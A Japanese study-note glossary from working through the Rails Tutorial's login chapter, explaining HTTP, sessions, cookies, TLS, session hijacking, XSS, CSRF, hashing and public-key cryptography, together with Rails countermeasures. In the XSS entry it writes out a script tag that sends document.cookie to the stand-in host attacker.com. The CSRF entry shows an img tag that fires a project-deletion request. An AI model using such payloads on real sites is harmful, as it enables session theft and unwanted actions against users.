Railsチュートリアル第8章のログイン、ログアウトで難しい用語がいくつか出てきたので整理しました。用語の説明は主にWikipediaからの引用です。
※ もっとよいまとめを見つけました。
・今さら聞けないセッションとCookie、ログイン・ログアウト(Rails編)
・エンジニアなら知っておきたい、絵で見てわかるセキュア通信の基本
以上を読んで難しいと感じたときに、用語の理解をこちらで確認して頂けたら。
用語集
HTTP(Hypertext Transfer Protocol)
WebブラウザとWebサーバの間で、HTMLなどのコンテンツの送受信に用いられる通信プロトコル。
ステートレス・プロトコル。それぞれのセッションの情報や状態を保持することをサーバーに要求しない。言い換えると、ブラウザのあるページから別のページに移動したときに、ユーザーのIDを保持しておく手段がHTTPプロトコル内には存在しない。
例)
・ステートレス: HTTP、IP
・ステートフル: TCP、FTP
セッション
ユーザーのログイン状態をHTTPでは記憶できないので、セッションでその情報を保持しましょうということ。
ユーザーログインの必要なWebアプリケーションでは、セッションと呼ばれる半永続的な接続をコンピュータ間 (ユーザーのパソコンのWebブラウザとRailsサーバーなど) に別途設定する。
Railsでセッションを実装する方法として最も一般的なのは、cookiesを使う方法。
クッキー(cookie)
HTTPにおける、サーバとブラウザ間で状態を管理するプロトコル。またはそこで用いられる、ブラウザに保存された情報、ブラウザに保存される小さなテキストデータ。
ステートレス・プロトコルであるHTTP上でステートフルなサービスを実現する。
ユーザ識別やセッション管理を実現する目的などに利用される。
Netscapeによって開発された。
例:
- サーバがブラウザにその状態を区別する識別子をHTTPヘッダに含める形で渡す。
- ブラウザは次にそのサーバと通信する際に、与えられた識別子をHTTPヘッダに含めて送信する。
- サーバはその識別子を元にコンテンツの内容をユーザに合わせてカスタマイズし、ブラウザに渡す。必要があれば新たな識別子もHTTPヘッダに含める。
TLS(Transport Layer Security)/SSL(Secure Socket Layer)
ローカルサーバから送信されネットワークに流れるデータは途中で捕捉できるため、これを修正するためにSSLを使う。
ローカルのサーバからネットワークに流れる前に、大事な情報を暗号化する技術。
パケットスニッファによるセッションIDの奪取(セッションハイジャック)を防ぐために、特にHTTPを暗号化で保護する。
トランスポート層プロトコル(通常はTCP)とアプリケーション層(HTTPなど)のあいだにおいて使われる。
HTTPS
SSL/TLS によって提供されるセキュアな接続の上でHTTP通信を行う。
Web上での個人情報の送信や電子決済などで用いられる。
サーバの認証・通信内容の暗号化・改竄検出などを行うことによって、なりすましや盗聴などの攻撃を防ぐ。
Nestscapeによって開発された。
セッションハイジャック
クラッキング、サイバーテロの一つ。
攻撃者が「セッションID」を得ることができ、その「セッションID」を用いてあたかも本人であるかのように通信を偽装することができればセッションハイジャックが成立する。そのため、 セッションIDの奪取 と偽装通信の実現がセッションハイジャックの基本となる。
【Railsチュートリアルで挙げられる有名な手法】
- 管理の甘いネットワークを通過するネットワークパケットから、パケットスニッファという特殊なソフトウェアで直接cookie(セッションID)を取り出す。
- データベースから記憶トークンを取り出す。
- クロスサイトスクリプティング(XSS)を使う。
- ユーザーがログインしているパソコンやスマホを直接操作してアクセスを奪い取る。(w)
【対策】
- SSLをサイト全体に適用して、ネットワークデータを暗号化で保護する。
- 記憶トークンをそのままデータベースに保存するのではなく、記憶トークンのハッシュ値を保存するようにする。
Railsチュートリアルでは生のパスワードをデータベースに保存する代わりに、パスワードのダイジェストを保存している。 - Railsによって自動的に対策が行われる。具体的には、ビューのテンプレートで入力した内容をすべて自動的にエスケープする。
- 具体的には、ユーザーが(別端末などで)ログアウトしたときにトークンを必ず変更するようにし、セキュリティ上重要になる可能性のある情報を表示するときはデジタル署名を行うようにする。
クロスサイトスクリプティング(XSS)
攻撃者は自ら作成したWebサイトや電子メールのURLやリンクの中に、主にJavaScriptで書かれた悪意のあるスクリプトを挿入し、被害者が日常的に使っているWebサイトから、セッションIDやパスワード、クレジットカード情報を盗んだり、望まない商品を購入させたり、ヒドいことをする。
例:
- 攻撃者のWebサイトで以下のスクリプトを挿入しておく。
<script>document.write('<img src="http://www.attacker.com/' + document.cookie + ''">');</script>
- 攻撃者のWebサーバーで、以下のようなアクセスログから被害者のセッションIDが取得できてしまう。
GET
http://www.attacker.com/_app_session=836c1c25278e5b321d6bea4f19cb57e2
入力のフィルタ(サニタイズ、悪意ある文字列 script
タグ等の除去)や、出力のエスケープが主な対策となる。
参考
・スクリプト注入: #1 ふたつの攻撃 - セキュアプログラミング講座 Webアプリケーション編 - IPA ISEC
・クロスサイトスクリプティング(XSS)とは?わかりやすく解説 - 攻撃遮断くん
クロスサイトリクエストフォージェリー(CSRF)
攻撃者はブラウザなどのユーザを騙し、意図しないリクエスト(たとえばHTTPリクエスト)をWebサーバに送信させる。Webアプリケーションがユーザからのリクエストを十分検証しないで受け取るよう設計されている場合、このリクエストを正規のものとして扱ってしまい、被害が発生する。
CSRF攻撃はURL、画像の読み込み、XMLHttpRequestなどを利用して実行される。
例:
- ボブは掲示板をブラウザで眺めていて、とあるハッカーによる書き込みを目にします。その書き込みに含まれるHTML
img
要素には悪質な仕掛けが施されています。その要素が実際に参照しているのは画像ファイルではなく、ボブのプロジェクト管理アプリケーションを標的にしたコマンド(<img src="http://www.webapp.com/project/1/destroy">
)です。 - ボブはここ数分間ログアウトしていないので、
www.webapp.com
に対するボブのセッションはまだ失効していません。 - ハッカーの書き込みがブラウザで表示されると、ブラウザは img タグを見つけます。そしてブラウザは
www.webapp.com
からその怪しい画像(/project/1/destroy
)を読み出そうとします。前述のとおり、このときに有効なセッションIDを含むcookieも一緒に送信されます。 -
www.webapp.com
のWebアプリケーションは、リクエストに対応するセッションハッシュに含まれるユーザー情報が有効であると認定し、その指示にしたがってID 1のプロジェクトを削除します。そしてブラウザは何らかの問題が生じたことを示す結果ページを表示します。画像は表示されません。
ボブは攻撃に気付いていません。しかし数日後にプロジェクトNo.1が削除されていることに気づきます。
Railsでは、自分のアプリケーション(上の例ではボブのサイト www.webapp.com
)において、セッションを作成したタイミングでサーバー側で発行している authenticity_token
が、リクエストに含まれている&妥当かどうかを検証することによって対策している。
参考
・【Rails API】CSRF 対策をあきらめないでちゃんとやる - どりみちのブログ
・RailsにおけるCSRF対策をできるだけ分かりやすく説明する - Zenn
ハッシュ関数
要約関数ともいう。あるデータを代表する数値を得るための関数。
ハッシュ関数から得られた数値のことを、要約値、ハッシュ値、またはハッシュという。
用途
・検索の高速化
・データ比較処理の高速化
・改竄の検出
暗号化とハッシュ化の違い
- 暗号化: 復元できる。秘匿が目的。
- ハッシュ化: 不可逆。データの置換が目的。
公開鍵暗号
「暗号化」の部分を公開し、「復号」の部分を秘密にする発想。1976年に世界最初の論文が発表された。
公開鍵暗号方式には、3つのアルゴリズムがある。
- 鍵生成アルゴリズム
- 暗号化アルゴリズム
- 復号アルゴリズム
モデル
- 全てのユーザーは鍵生成アルゴリズムを実行し、公開鍵および秘密鍵を持つ。各ユーザーは秘密鍵を秘密裏に保管し、公開鍵を皆に公開する。(よってユーザーの秘密鍵を知っているのはそのユーザー自身だけであるが、それに対しユーザーの公開鍵を知っているのは全てのユーザーである。)
・公開鍵: 暗号文を作成するのに使う
・秘密鍵: その暗号文を復元するのに使う - 送信者が暗号文を送るには、メッセージ と 受信者の公開鍵を入力として、暗号化アルゴリズムを実行する。
- 受信者がもとのメッセージを復元するには、受信者の秘密鍵 と 暗号文を入力として、復号アルゴリズムを実行する。
公開鍵は公開情報であり、それに対応する秘密鍵は受信者本人しか知らない。(よって公開されている公開鍵を使えば誰でも暗号文を作成できるが、それに対しその暗号文を複合できるのは受信者本人のみである。)
典型的な例
・RSA暗号方式: 桁数が大きい合成数の素因数分解問題が困難であることを安全性の根拠とした公開鍵暗号の一つ。暗号とデジタル署名を実現できる方式として最初に公開された。